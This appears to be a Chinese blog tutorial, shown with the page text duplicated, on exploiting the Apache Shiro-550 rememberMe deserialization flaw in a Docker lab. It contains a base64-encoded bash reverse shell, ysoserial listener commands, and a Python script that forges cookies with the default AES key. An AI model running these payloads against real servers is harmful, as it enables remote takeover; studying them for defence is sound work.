Shiro remeberMe反序列化漏洞（Shiro-550）

1.漏洞原理

Apache Shiro框架提供了记住密码的功能（RememberMe），用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值，先base64解码然后AES解密再反序列化，就导致了反序列化RCE漏洞。

那么，Payload产生的过程：命令=》序列化=》AES加密=》base64编码=》RememberMe Cookie值

在整个漏洞利用过程中，比较重要的是AES加密的密钥，如果没有修改默认的密钥那么久很容易就知道密钥，payload构造起来也是十分简单。

1.1影响版本：Apache Shiro < 1.2.4

1.2特征判断：返回包中包含rememberMe=deleteMe字段

2.漏洞发现

2.1环境搭建

获取docker镜像

docker pull medicean/vulapps:s_shiro_1

启动docker镜像：

docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1

2.2漏洞检测

这里使用一个shiro_exploit工具，检查是否存在默认的key

github项目地址：https://github.com/insightglacier/Shiro_exploit

使用方法：python2 shiro_exploit.py –u 目标机地址及端口

会不停的匹配key值，共22种。通过对靶场的测试我们发现使用红框里的AES密钥，有了key之后有两种利用方式。

3.漏洞利用

3.1利用方式一：反弹shell

3.1.1制作反弹shell代码

监听本地端口

nc –lvp 1234

Java Runtime配合bash编码，在线编码地址：http://www.jackson-t.ca/runtime-exec-payloads.html

得到编码后的结果: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxLjEyOS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}

3.1.2通过ysoserial中JRMP监听模块，监听6666端口并执行反弹shell命令。

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxLjEyOS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}"

3.1.3使用shiro.py生成payload

python shiro.py 192.168.21.129:6666

shiro.py代码如下：

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
     popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
     BS = AES.block_size
     pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
     key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
     iv = uuid.uuid4().bytes
     encryptor = AES.new(key, AES.MODE_CBC, iv)
     file_body = pad(popen.stdout.read())
     base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
     return base64_ciphertext

if __name__ == '__main__':
     payload = encode_rememberme(sys.argv[1])
print "rememberMe={0}".format(payload.decode())

3.1.4构造数据包，伪造cookie，发送payload

输入任意账号密码，记住选择rememberme选项

将之前生成的payload加入到cookie中发送

nc监听端口，成功反弹

Java监听接口，查看服务器链接情况

一键化自动化工具：https://github.com/feihong-cs/ShiroExploit

posted @ 2020-07-16 15:33 我要变超人阅读(8400) 评论(0) 编辑收藏举报

刷新页面返回顶部

我要变超人

Shiro remeberMe反序列化漏洞（Shiro-550）

1.漏洞原理

1.1影响版本：Apache Shiro < 1.2.4

1.2特征判断：返回包中包含rememberMe=deleteMe字段

2.漏洞发现

2.1环境搭建

获取docker镜像

docker pull medicean/vulapps:s_shiro_1

启动docker镜像：

docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1

2.2漏洞检测

这里使用一个shiro_exploit工具，检查是否存在默认的key

github项目地址：https://github.com/insightglacier/Shiro_exploit

使用方法：python2 shiro_exploit.py –u 目标机地址及端口

3.漏洞利用

3.1利用方式一：反弹shell

3.1.1制作反弹shell代码

监听本地端口

nc –lvp 1234

Java Runtime配合bash编码，在线编码地址：http://www.jackson-t.ca/runtime-exec-payloads.html

得到编码后的结果: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxLjEyOS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}

3.1.2通过ysoserial中JRMP监听模块，监听6666端口并执行反弹shell命令。

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxLjEyOS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}"

3.1.3使用shiro.py生成payload

python shiro.py 192.168.21.129:6666

shiro.py代码如下：

import sys

import uuid

import base64

import subprocess

from Crypto.Cipher import AES

def encode_rememberme(command):

popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)

BS = AES.block_size

pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()

key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")

iv = uuid.uuid4().bytes

encryptor = AES.new(key, AES.MODE_CBC, iv)

file_body = pad(popen.stdout.read())

base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))

return base64_ciphertext

if __name__ == '__main__':

payload = encode_rememberme(sys.argv[1])

print "rememberMe={0}".format(payload.decode())